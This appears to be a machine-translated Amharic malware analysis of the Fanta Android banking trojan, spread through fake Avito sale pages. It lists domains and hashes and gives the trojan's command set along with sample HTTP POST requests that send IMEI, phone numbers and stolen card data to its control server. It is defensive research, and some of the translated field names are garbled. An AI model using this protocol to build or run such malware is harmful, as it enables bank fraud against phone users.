ፕሮሆስተር > ጦማር > የኢንተርኔት ዜና > Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ

አንድ ቀን በአቪቶ ላይ የሆነ ነገር መሸጥ ይፈልጋሉ እና የምርትዎን ዝርዝር መግለጫ ከለጠፉ (ለምሳሌ ፣ RAM ሞጁል) ይህ መልእክት ይደርስዎታል-

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴሊንኩን ከከፈቱ በኋላ፣ እርስዎ ደስተኛ እና ስኬታማ ሻጭ ግዢ መፈጸሙን የሚያሳውቅ የማይጎዳ የሚመስል ገጽ ያያሉ።

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ
አንዴ የ«ቀጥል» ቁልፍን ጠቅ ካደረጉ በኋላ አዶ እና እምነት የሚጣልበት ስም ያለው የኤፒኬ ፋይል ወደ አንድሮይድ መሳሪያዎ ይወርዳል። በሆነ ምክንያት የተደራሽነት አገልግሎት መብቶችን የጠየቁ አፕሊኬሽን ከጫኑ በኋላ ሁለት መስኮቶች ታዩ እና በፍጥነት ጠፉ እና... በቃ።

ቀሪ ሂሳብዎን ለማየት ይሄዳሉ፣ ነገር ግን በሆነ ምክንያት የእርስዎ የባንክ መተግበሪያ የካርድዎን ዝርዝሮች እንደገና ይጠይቃል። ውሂቡን ከገቡ በኋላ, አንድ አስፈሪ ነገር ይከሰታል: በሆነ ምክንያት ለእርስዎ ግልጽ ባልሆነ ምክንያት, ገንዘብ ከመለያዎ መጥፋት ይጀምራል. ችግሩን ለመፍታት እየሞከሩ ነው, ነገር ግን ስልክዎ ይቃወማል: "ተመለስ" እና "ቤት" ቁልፎችን ይጫናል, አያጠፋም እና ምንም አይነት የደህንነት እርምጃዎችን እንዲያነቁ አይፈቅድም. በውጤቱም, ያለ ገንዘብ ቀርተዋል, እቃዎችዎ አልተገዙም, ግራ ተጋብተዋል እና ምን ተፈጠረ?

መልሱ ቀላል ነው፡ የFlexnet ቤተሰብ አባል የሆነው የፋንታ አንድሮይድ ትሮጃን ሰለባ ሆነዋል። ይህ እንዴት ሊሆን ቻለ? አሁን እናብራራ።

ደራሲያን አንድሬ ፖሎቪንኪንበማልዌር ትንተና ውስጥ ጁኒየር ስፔሻሊስት ኢቫን ፒሳሬቭ, በማልዌር ትንተና ውስጥ ስፔሻሊስት.

አንዳንድ ስታቲስቲክስ

የFlexnet የአንድሮይድ ትሮጃኖች ቤተሰብ ለመጀመሪያ ጊዜ የታወቀው በ2015 ነው። በጣም ረጅም በሆነ እንቅስቃሴ ቤተሰቡ ወደ ተለያዩ ንዑስ ዓይነቶች ተስፋፋ፡-ፋንታ፣ሊምቦት፣ሊፕቶን፣ወዘተ። ትሮጃን እና ከሱ ጋር የተያያዙ መሠረተ ልማቶች አሁንም አይቆሙም አዳዲስ ውጤታማ የስርጭት መርሃግብሮች እየተዘጋጁ ናቸው - በእኛ ሁኔታ ከፍተኛ ጥራት ያለው የማስገር ገፆች ለአንድ የተወሰነ ተጠቃሚ ሻጭ እና የትሮጃን ገንቢዎች የፋሽን አዝማሚያዎችን ይከተላሉ. የቫይረስ መፃፍ - ከተበከሉ መሳሪያዎች ገንዘብን በብቃት ለመስረቅ እና የመከላከያ ዘዴዎችን ለማለፍ የሚያስችል አዲስ ተግባር ማከል።

በዚህ ጽሑፍ ውስጥ የተገለጸው ዘመቻ ከሩሲያ የመጡ ተጠቃሚዎች ላይ ያነጣጠረ ነው፤ በዩክሬን ውስጥ አነስተኛ ቁጥር ያላቸው የተጠቁ መሣሪያዎች ተመዝግበዋል እና በካዛክስታን እና ቤላሩስም ያነሱ ናቸው።

ምንም እንኳን ፍሌክስኔት በአንድሮይድ ትሮጃን መድረክ ከ4 አመታት በላይ የቆየ ቢሆንም እና በብዙ ተመራማሪዎች በዝርዝር የተጠና ቢሆንም አሁንም በጥሩ ሁኔታ ላይ ይገኛል። ከጃንዋሪ 2019 ጀምሮ የጉዳቱ መጠን ከ 35 ሚሊዮን ሩብልስ በላይ ነው - እና ይህ በሩሲያ ውስጥ ለሚደረጉ ዘመቻዎች ብቻ ነው። እ.ኤ.አ. በ 2015 ፣ የዚህ አንድሮይድ ትሮጃን የተለያዩ ስሪቶች በመሬት ውስጥ መድረኮች ተሸጡ ፣ የትሮጃን ምንጭ ኮድ ከዝርዝር መግለጫ ጋር ሊገኝ ይችላል። ይህ ማለት በአለም ላይ ያለው የጉዳት ስታቲስቲክስ የበለጠ አስደናቂ ነው. ለእንዲህ ዓይነቱ አዛውንት መጥፎ አመላካች አይደለም ፣ አይደለም?

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ

ከሽያጭ ወደ ማታለል

አቪቶ ማስታወቂያዎችን ለመለጠፍ ለኢንተርኔት አገልግሎት የማስገር ገጽ ቀደም ሲል ከቀረበው ቅጽበታዊ ገጽ እይታ እንደሚታየው ለአንድ የተወሰነ ተጎጂ ተዘጋጅቷል። በግልጽ ለማየት እንደሚቻለው አጥቂዎቹ የሻጩን ስልክ ቁጥር እና ስም እንዲሁም የምርት መግለጫውን የሚያወጣውን የአቪቶ ተንታኞች አንዱን ይጠቀማሉ። ገጹን ካሰፋ በኋላ እና የኤፒኬ ፋይሉን ካዘጋጁ በኋላ፣ ተጎጂው ስሙን የያዘ ኤስ ኤም ኤስ ይላካል እና ወደ አስጋሪ ገጽ የሚወስድ አገናኝ ስለ ምርቱ መግለጫ እና ከምርቱ “ሽያጭ” የተቀበለውን መጠን የያዘ ነው። አዝራሩን ጠቅ በማድረግ ተጠቃሚው ተንኮል አዘል የAPK ፋይል ይቀበላል - ፋንታ።

የ shcet491[.] ru ጎራ ጥናት እንደሚያሳየው ለአስተናጋጅ ዲ ኤን ኤስ አገልጋዮች ውክልና ተሰጥቶታል፡

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

የጎራ ዞን ፋይል ወደ አይፒ አድራሻዎች 31.220.23[.]236፣ 31.220.23[.]243 እና 31.220.23[.]235 የሚያመለክቱ ግቤቶችን ይዟል። ነገር ግን፣ የዶራው ዋና የመረጃ መዝገብ (ኤ ሪከርድ) IP አድራሻ 178.132.1[.]240 ያለውን አገልጋይ ይጠቁማል።

አይፒ አድራሻ 178.132.1[.]240 የሚገኘው በኔዘርላንድ ውስጥ ሲሆን የአስተናጋጁ ነው WorldStream. አይፒ አድራሻዎች 31.220.23[.]235፣ 31.220.23[.]236 እና 31.220.23[.]243 በዩኬ ውስጥ የሚገኙ እና የተጋራ ማስተናገጃ አገልጋይ HOSTINGER ናቸው። እንደ መቅጃ ጥቅም ላይ ይውላል openprov-ru. የሚከተሉት ጎራዎች እንዲሁም ለአይፒ አድራሻው 178.132.1[.]240 ተፈትተዋል፡

  • sdelka-ru[.]ru
  • tovar-av[.] ru
  • av-tovar[.]ru
  • ru-sdelka[.] ru
  • shcet382[.] ru
  • sdelka221[.] ru
  • sdelka211[.] ru
  • vyplata437[.] ru
  • viplata291[.] ru
  • perevod273[.] ru
  • perevod901[.] ru

በሚከተለው ቅርጸት አገናኞች ከሞላ ጎደል ከሁሉም ጎራዎች ይገኙ እንደነበር ልብ ሊባል ይገባል።

http://(www.){0,1}<%domain%>/[0-9]{7}

ይህ አብነት ከኤስኤምኤስ መልእክት የመጣ አገናኝንም ያካትታል። በታሪካዊ መረጃ ላይ በመመስረት አንድ ጎራ ከላይ በተገለጸው ስርዓተ-ጥለት ከበርካታ አገናኞች ጋር እንደሚዛመድ ታውቋል፣ ይህም አንድ ጎራ ትሮጃንን ለብዙ ተጎጂዎች ለማከፋፈል ጥቅም ላይ እንደዋለ ያሳያል።

ትንሽ ወደፊት እንዝለል፡ ከኤስኤምኤስ በአገናኝ የወረደው ትሮጃን አድራሻውን እንደ መቆጣጠሪያ አገልጋይ ይጠቀማል onuseseddohap[.] ክለብ. ይህ ጎራ በ2019-03-12 የተመዘገበ ሲሆን ከ2019-04-29 ጀምሮ የኤፒኬ መተግበሪያዎች ከዚህ ጎራ ጋር መስተጋብር ፈጥረዋል። ከVirusTotal በተገኘ መረጃ መሰረት በድምሩ 109 አፕሊኬሽኖች ከዚህ አገልጋይ ጋር ተግባብተዋል። ጎራው ራሱ ወደ አይፒ አድራሻው ቀርቧል 217.23.14[.] 27በኔዘርላንድ ውስጥ የሚገኝ እና በአስተናጋጁ ባለቤትነት የተያዘ WorldStream. እንደ መቅጃ ጥቅም ላይ ይውላል መሰየሚያ. ጎራዎች እንዲሁ ለዚህ አይፒ አድራሻ ተፈትተዋል። መጥፎ-ራኮን[.] ክለብ (ከ2018-09-25 ጀምሮ) እና መጥፎ-ራኮን[.] መኖር (ከ2018-10-25 ጀምሮ)። ከጎራ ጋር መጥፎ-ራኮን[.] ክለብ ከ 80 በላይ የኤፒኬ ፋይሎች ከ ጋር መስተጋብር ፈጥረዋል። መጥፎ-ራኮን[.] መኖር - ከ 100 በላይ.

በአጠቃላይ ጥቃቱ በሚከተለው መንገድ ይከናወናል.

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ

በፋንታ ክዳን ስር ምን አለ?

ልክ እንደሌሎች አንድሮይድ ትሮጃኖች፣ ፋንታ የኤስኤምኤስ መልዕክቶችን ማንበብ እና መላክ፣ የUSSD ጥያቄዎችን ማቅረብ እና የራሱን መስኮቶች በአፕሊኬሽኖች ላይ ማሳየት ይችላል (የባንኮችን ጨምሮ)። ይሁን እንጂ የዚህ ቤተሰብ የተግባር መሳሪያ መጥቷል፡ ፋንታ መጠቀም ጀመረች። የተደራሽነት አገልግሎት ለተለያዩ ዓላማዎች፡ የሌሎች መተግበሪያዎችን የማሳወቂያ ይዘቶች ማንበብ፣ ትሮጃን በተበከለ መሳሪያ ላይ እንዳይገኝ መከላከል እና ማስቆም፣ ወዘተ. Fanta በሁሉም የአንድሮይድ ስሪቶች ከ4.4 ያላነሱ ይሰራል። በዚህ ጽሑፍ ውስጥ የሚከተለውን የፋንታ ናሙና በዝርዝር እንመለከታለን።

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

ከተነሳ በኋላ ወዲያውኑ

ልክ ከተጀመረ በኋላ ትሮጃኑ አዶውን ይደብቃል። አፕሊኬሽኑ ሊሠራ የሚችለው የተበከለው መሣሪያ ስም በዝርዝሩ ውስጥ ከሌለ ብቻ ነው፡-

  • አንድሮይድ_x86
  • VirtualBox
  • Nexus 5X(በሬ ጭንቅላት)
  • Nexus 5(ምላጭ)

ይህ ቼክ የሚከናወነው በትሮጃን ዋና አገልግሎት ውስጥ ነው - ዋና አገልግሎት. ለመጀመሪያ ጊዜ ሲጀመር የመተግበሪያው ውቅር ግቤቶች ወደ ነባሪ እሴቶች ተጀምረዋል (የውቅር ውሂብን ለማከማቸት ቅርጸት እና ትርጉማቸው በኋላ ላይ ይብራራል) እና አዲስ የተበከለ መሣሪያ በቁጥጥር አገልጋዩ ላይ ተመዝግቧል። የኤችቲቲፒ POST ጥያቄ ከመልእክቱ አይነት ጋር ወደ አገልጋዩ ይላካል ይመዝገቡ_bot እና ስለተበከለው መሳሪያ መረጃ (የአንድሮይድ ስሪት, IMEI, ስልክ ቁጥር, የኦፕሬተር ስም እና ኦፕሬተሩ የተመዘገበበት የአገር ኮድ). አድራሻው እንደ መቆጣጠሪያ አገልጋይ ሆኖ ያገለግላል hXXp://onuseseddohap[.]club/controller.php. በምላሹ, አገልጋዩ መስኮቹን የያዘ መልእክት ይልካል bot_id, bot_pwd, አገልጋይ - መተግበሪያው እነዚህን እሴቶች እንደ የ CnC አገልጋይ መለኪያዎች ያስቀምጣቸዋል. መለኪያ አገልጋይ መስኩ ካልተቀበለ እንደ አማራጭ: Fanta የምዝገባ አድራሻውን ይጠቀማል - hXXp://onuseseddohap[.]club/controller.php. የ CnC አድራሻን የመቀየር ተግባር ሁለት ችግሮችን ለመፍታት ሊያገለግል ይችላል-ጭነቱን በበርካታ አገልጋዮች መካከል በእኩል መጠን ለማሰራጨት (ብዙ ቁጥር ያላቸው የተበከሉ መሳሪያዎች ካሉ ፣ ባልተመቻቸ የድር አገልጋይ ላይ ያለው ጭነት ከፍተኛ ሊሆን ይችላል) እና እንዲሁም ለመጠቀም። ከ CnC አገልጋዮች መካከል አንዱ ካልተሳካ አማራጭ አገልጋይ .

ጥያቄውን በመላክ ላይ ስህተት ከተፈጠረ ትሮጃኑ የምዝገባ ሂደቱን ከ20 ሰከንድ በኋላ ይደግማል።

መሣሪያው በተሳካ ሁኔታ ከተመዘገበ በኋላ ፋንታ የሚከተለውን መልእክት ለተጠቃሚው ያሳያል፡-

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ
ጠቃሚ ማሳሰቢያ፡ የተጠራ አገልግሎት የስርዓት ደህንነት - የትሮጃን አገልግሎት ስም, እና አዝራሩን ጠቅ ካደረጉ በኋላ እሺ ተጠቃሚው ለተንኮል አዘል አገልግሎቱ የተደራሽነት መብቶችን የሚሰጥበት የተበከለው መሳሪያ የተደራሽነት ቅንብሮች ያለው መስኮት ይከፈታል።

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ
ተጠቃሚው እንደበራ ወዲያውኑ የተደራሽነት አገልግሎት, Fanta የመተግበሪያ መስኮቶችን ይዘቶች እና በእነሱ ውስጥ የተከናወኑ ድርጊቶች መዳረሻ አግኝቷል:

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ
የተደራሽነት መብቶችን ከተቀበለ በኋላ ትሮጃኑ የአስተዳዳሪ መብቶችን እና ማሳወቂያዎችን የማንበብ መብቶችን ይጠይቃል፡-

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ
የተደራሽነት አገልግሎትን በመጠቀም አፕሊኬሽኑ የቁልፍ ጭነቶችን ያስመስላል፣ በዚህም ሁሉንም አስፈላጊ መብቶች ለራሱ ይሰጣል።

Fanta የውቅረት ውሂብን ለማከማቸት አስፈላጊ የሆኑ በርካታ የውሂብ ጎታ አጋጣሚዎችን (በኋላ ላይ ይብራራሉ) እንዲሁም በሂደቱ ውስጥ ስለተበከለው መሳሪያ የተሰበሰቡ መረጃዎችን ይፈጥራል። የተሰበሰበውን መረጃ ለመላክ ትሮጃን ከመረጃ ቋቱ ውስጥ መስኮችን ለማውረድ እና ከመቆጣጠሪያ አገልጋዩ ትዕዛዝ ለመቀበል የተነደፈ ተደጋጋሚ ተግባር ይፈጥራል። CnCን ለመድረስ ያለው የጊዜ ክፍተት እንደ አንድሮይድ ስሪት ተዘጋጅቷል፡ በ 5.1 ሁኔታ ውስጥ, ክፍተቱ 10 ሰከንድ ይሆናል, አለበለዚያ 60 ሰከንድ.

ትዕዛዙን ለመቀበል ፋንታ ጥያቄ ያቀርባል GetTask ወደ አስተዳደር አገልጋይ. በምላሹ፣ CnC ከሚከተሉት ትዕዛዞች ውስጥ አንዱን መላክ ይችላል።

ቡድን መግለጫ
0 የኤስኤምኤስ መልእክት ይላኩ።
1 የስልክ ጥሪ ወይም የUSSD ትዕዛዝ ያድርጉ
2 መለኪያ ያዘምናል። የእረፍት ጊዜ
3 መለኪያ ያዘምናል። ማረም
6 መለኪያ ያዘምናል። ኤስኤምኤስ አስተዳዳሪ
9 የኤስኤምኤስ መልዕክቶችን መሰብሰብ ይጀምሩ
11 ስልክዎን ወደ ፋብሪካ ቅንብሮች ዳግም ያስጀምሩት።
12 የንግግር ሳጥን መፍጠርን አንቃ/አቦዝን

ፋንታ በተጨማሪም ከ70 የባንክ መተግበሪያዎች፣ ፈጣን የክፍያ ሥርዓቶች እና ኢ-wallets ማሳወቂያዎችን ይሰበስባል እና በመረጃ ቋት ውስጥ ያከማቻል።

የውቅር መለኪያዎችን በማከማቸት ላይ

የውቅር መለኪያዎችን ለማከማቸት ፋንታ ለአንድሮይድ መድረክ መደበኛ አቀራረብን ይጠቀማል - ምርጫዎች- ፋይሎች. ቅንብሮቹ በተሰየመ ፋይል ውስጥ ይቀመጣሉ። ቅንብሮች. የተቀመጡ መለኪያዎች መግለጫ ከዚህ በታች ባለው ሠንጠረዥ ውስጥ ነው.

ስም ነባሪ እሴት ሊሆኑ የሚችሉ እሴቶች መግለጫ
id 0 ኢንቲጀር የቦት መታወቂያ
አገልጋይ hXXp://onuseseddohap[.]club/ ዩ አር ኤል የአገልጋይ አድራሻን ይቆጣጠሩ
ፒ - ሕብረቁምፊ የአገልጋይ ይለፍ ቃል
የእረፍት ጊዜ 20 ኢንቲጀር የጊዜ ክፍተት. የሚከተሉት ተግባራት ለምን ያህል ጊዜ መዘግየት እንዳለባቸው ያመላክታል፡-

  • ሾለ የተላከ የኤስኤምኤስ መልእክት ሁኔታ ጥያቄ ሲልኩ
  • ከአስተዳዳሪ አገልጋይ አዲስ ትእዛዝ በመቀበል ላይ
ማረም ሁሉ ሁሉም/ ቴል ቁጥር መስኩ ከሕብረቁምፊው ጋር እኩል ከሆነ ሁሉ ወይም ቴል ቁጥር, ከዚያም የተቀበለው የኤስኤምኤስ መልእክት በመተግበሪያው ይጠለፈ እና ለተጠቃሚው አይታይም
ኤስኤምኤስ አስተዳዳሪ 0 0/1 መተግበሪያውን እንደ ነባሪ የኤስኤምኤስ ተቀባይ አንቃ/አቦዝን
readDialog የሐሰት እውነት/ውሸት የክስተት ምዝግብ ማስታወሻን አንቃ/አሰናክል ተደራሽነት ክስተት

ፋንታ ፋይሉንም ይጠቀማል ኤስኤምኤስ አስተዳዳሪ:

ስም ነባሪ እሴት ሊሆኑ የሚችሉ እሴቶች መግለጫ
ፒኬጂ - ሕብረቁምፊ ጥቅም ላይ የዋለው የኤስኤምኤስ መልእክት አስተዳዳሪ ስም

ከመረጃ ቋቶች ጋር መስተጋብር

በሚሠራበት ጊዜ ትሮጃን ሁለት የውሂብ ጎታዎችን ይጠቀማል. የውሂብ ጎታ ተሰይሟል a ከስልክ የተሰበሰቡ የተለያዩ መረጃዎችን ለማከማቸት ይጠቅማል። ሁለተኛው የውሂብ ጎታ ተሰይሟል fanta.db እና ስለ ባንክ ካርዶች መረጃ ለመሰብሰብ የተነደፉ የማስገር መስኮቶችን ለመፍጠር ኃላፊነት ያላቸው ቅንብሮችን ለማስቀመጥ ይጠቅማል።

ትሮጃን የውሂብ ጎታ ይጠቀማል а የተሰበሰበ መረጃን ለማከማቸት እና ድርጊቶችዎን ለመመዝገብ. መረጃ በሠንጠረዥ ውስጥ ተከማችቷል መዝገቦች. ሠንጠረዥ ለመፍጠር የሚከተለውን የSQL ጥያቄ ይጠቀሙ፡-

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

የመረጃ ቋቱ የሚከተሉትን መረጃዎች ይዟል፡-

1. የተበከለውን መሳሪያ ጅምር በመልእክት ማስገባት ስልኩ በርቷል!

2. ከመተግበሪያዎች ማሳወቂያዎች. መልእክቱ የሚመነጨው በሚከተለው አብነት መሰረት ነው።

(<%App Name%>)<%Title%>: <%Notification text%>

3. በትሮጃን ከተፈጠሩ የማስገር ቅጾች የባንክ ካርድ መረጃ። መለኪያ VIEW_NAME ከሚከተሉት ውስጥ አንዱ ሊሆን ይችላል፡-

  • AliExpress
  • አዊቶ
  • የ google Play
  • የተለያዩ <%የመተግበሪያ ስም%>

መልእክቱ በቅርጸት ገብቷል፡-

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. ገቢ/ወጪ የኤስኤምኤስ መልዕክቶች በቅርጸት፡-

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. የንግግር ሳጥኑን በቅርጸት ስለሚፈጥር ጥቅል መረጃ፡-

(<%Package name%>)<%Package information%>

ምሳሌ ሠንጠረዥ መዝገቦች:

Leysya፣ Fanta፡ ለአሮጌ አንድሮይድ ትሮጃን አዲስ ዘዴ
የፋንታ አንዱ ተግባር ስለ ባንክ ካርዶች መረጃ መሰብሰብ ነው። የባንክ አፕሊኬሽኖችን በሚከፍቱበት ጊዜ የመረጃ አሰባሰብ የአስጋሪ መስኮቶችን በመፍጠር ይከሰታል። ትሮጃን የማስገር መስኮቱን አንድ ጊዜ ብቻ ይፈጥራል። መስኮቱ ለተጠቃሚው የታየበት መረጃ በሰንጠረዥ ውስጥ ተቀምጧል ቅንብሮች በመረጃ ቋቱ ውስጥ fanta.db. የውሂብ ጎታ ለመፍጠር የሚከተለውን የSQL ጥያቄ ይጠቀሙ፡-

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

ሁሉም የጠረጴዛ መስኮች ቅንብሮች በነባሪነት ወደ 1 ተጀምሯል (የአስጋሪ መስኮት ይፍጠሩ)። ተጠቃሚው ውሂባቸውን ካስገባ በኋላ እሴቱ ወደ 0. የሠንጠረዥ መስኮች ምሳሌ ይዘጋጃል ቅንብሮች:

  • መግባት_ይችላል - መስክ የባንክ ማመልከቻ ሲከፍት ቅጹን የማሳየት ሃላፊነት አለበት።
  • የመጀመሪያ_ባንክ - ጥቅም ላይ አልዋለም
  • ይችላል_አቪቶ - መስክ የአቪቶ መተግበሪያን ሲከፍት ቅጹን የማሳየት ሃላፊነት አለበት።
  • ይችላል_አሊ - መስኩ የ Aliexpress መተግበሪያን ሲከፍት ቅጹን የማሳየት ሃላፊነት አለበት።
  • ሌላ_ይችላል - መስኩ ማንኛውንም ማመልከቻ ከዝርዝሩ ሲከፍት ቅጹን የማሳየት ሃላፊነት አለበት: Yula፣ Pandao፣ Drom Auto፣ Wallet ቅናሽ እና ጉርሻ ካርዶች, Aviasales, ቦታ ማስያዝ, Trivago
  • የካርድ_ካርድ - መስኩ በሚከፈትበት ጊዜ ቅጹን የማሳየት ሃላፊነት አለበት የ google Play

ከአስተዳደር አገልጋይ ጋር መስተጋብር

ከአስተዳዳሪ አገልጋይ ጋር የአውታረ መረብ መስተጋብር በኤችቲቲፒ ፕሮቶኮል በኩል ይከሰታል። ከአውታረ መረቡ ጋር ለመስራት፣ Fanta ታዋቂውን Retrofit ላይብረሪ ይጠቀማል። ጥያቄዎች ወደሚከተለው ይላካሉ፡- hXXp://onuseseddohap[.]club/controller.php. በአገልጋዩ ላይ ሲመዘገቡ የአገልጋዩ አድራሻ ሊለወጥ ይችላል. ኩኪዎች ከአገልጋዩ ምላሽ ሊላኩ ይችላሉ። ፋንታ ለአገልጋዩ የሚከተሉትን ጥያቄዎች ያቀርባል፡-

  • በመቆጣጠሪያ አገልጋዩ ላይ የቦት መመዝገብ አንድ ጊዜ, መጀመሪያ ሲጀመር ይከሰታል. ስለተበከለው መሳሪያ የሚከተለው መረጃ ወደ አገልጋዩ ይላካል፡
    · ኩኪ - ከአገልጋዩ የተቀበሉ ኩኪዎች (ነባሪው ዋጋ ባዶ ሕብረቁምፊ ነው)
    · ሞድ - ሕብረቁምፊ ቋሚ ይመዝገቡ_bot
    · ቅድመ ቅጥያ - ቋሚ ኢንቲጀር 2
    · ስሪት_sdk - በሚከተለው አብነት መሰረት ይመሰረታል- <%Build.MODEL%>/<%Build.VERSION.መለቀቅ%>(Avit)
    · IMEI - የተበከለው መሣሪያ IMEI
    · አገር - ኦፕሬተሩ የተመዘገበበት አገር ኮድ, በ ISO ቅርጸት
    · ቁጥር - ስልክ ቁጥር
    · ስልከኛ - የኦፕሬተር ስም

    ለአገልጋዩ የተላከ ጥያቄ ምሳሌ፡-

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    ለጥያቄው ምላሽ፣ አገልጋዩ የሚከተሉትን መለኪያዎች የያዘ የJSON ነገር መመለስ አለበት፡
    · bot_id - የተበከለው መሣሪያ መታወቂያ. bot_id ከ 0 ጋር እኩል ከሆነ፣ Fanta ጥያቄውን በድጋሚ ይፈጽማል።
    bot_pwd - ለአገልጋዩ የይለፍ ቃል.
    አገልጋይ - የአገልጋይ አድራሻን ይቆጣጠሩ። አማራጭ መለኪያ. መለኪያው ካልተገለጸ, በመተግበሪያው ውስጥ የተቀመጠው አድራሻ ጥቅም ላይ ይውላል.

    ምሳሌ JSON ነገር፡-

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • ከአገልጋዩ ትዕዛዝ ለመቀበል ይጠይቁ። የሚከተለው ውሂብ ወደ አገልጋዩ ይላካል፡
    · ኩኪ - ከአገልጋዩ የተቀበሉ ኩኪዎች
    · ጨረታ - ጥያቄውን ሲልኩ የተቀበለው የተበከለው መሣሪያ መታወቂያ ይመዝገቡ_bot
    · ፒ - ለአገልጋዩ የይለፍ ቃል
    · ዲቪስ_አስተዳዳሪ - መስኩ የአስተዳዳሪ መብቶች መገኘታቸውን ይወስናል። የአስተዳዳሪ መብቶች ከተገኙ, መስኩ እኩል ነው 1አለበለዚያ 0
    · ተደራሽነት - የተደራሽነት አገልግሎት የስራ ሁኔታ። አገልግሎቱ ከተጀመረ ዋጋው ነው። 1አለበለዚያ 0
    · የኤስኤምኤስ አስተዳዳሪ — ትሮጃን እንደ ነባሪ ኤስኤምኤስ ለመቀበል መነቃቱን ያሳያል
    · ስክሪን - የማሳያውን ሁኔታ ያሳያል. ዋጋው ይዘጋጃል። 1, ማያ ገጹ በርቶ ከሆነ, አለበለዚያ 0;

    ለአገልጋዩ የተላከ ጥያቄ ምሳሌ፡-

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    በትእዛዙ ላይ በመመስረት አገልጋዩ የJSON ነገርን ከተለያዩ መለኪያዎች ጋር መመለስ ይችላል፡-

    · ቡድን የኤስኤምኤስ መልእክት ይላኩ።: መለኪያዎቹ የስልክ ቁጥሩን, የኤስኤምኤስ መልእክት ጽሁፍ እና የተላከውን መልእክት መታወቂያ ይይዛሉ. መለያው ከአይነት ጋር ወደ አገልጋዩ መልእክት ሲላክ ጥቅም ላይ ይውላል setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · ቡድን የስልክ ጥሪ ወይም የUSSD ትዕዛዝ ያድርጉ: የስልክ ቁጥሩ ወይም ትዕዛዝ የሚመጣው በምላሽ አካል ውስጥ ነው. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · ቡድን የጊዜ ክፍተት መለኪያ ለውጥ. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · ቡድን የመጥለፍ መለኪያን ቀይር. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · ቡድን የSmsManager መስክን ቀይር. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · ቡድን የኤስኤምኤስ መልዕክቶችን ከተበከለ መሣሪያ ሰብስብ.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · ቡድን ስልክዎን ወደ ፋብሪካ ቅንብሮች ዳግም ያስጀምሩት።: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · ቡድን የReadDialog መለኪያን ይቀይሩ. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • ከአይነት ጋር መልእክት በመላክ ላይ setSmsStatus. ይህ ጥያቄ ትዕዛዙ ከተፈጸመ በኋላ ነው የኤስኤምኤስ መልእክት ይላኩ።. ጥያቄው ይህን ይመስላል።

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • የውሂብ ጎታ ይዘቶችን በመስቀል ላይ። አንድ ረድፍ በጥያቄ ይተላለፋል። የሚከተለው ውሂብ ወደ አገልጋዩ ይላካል፡
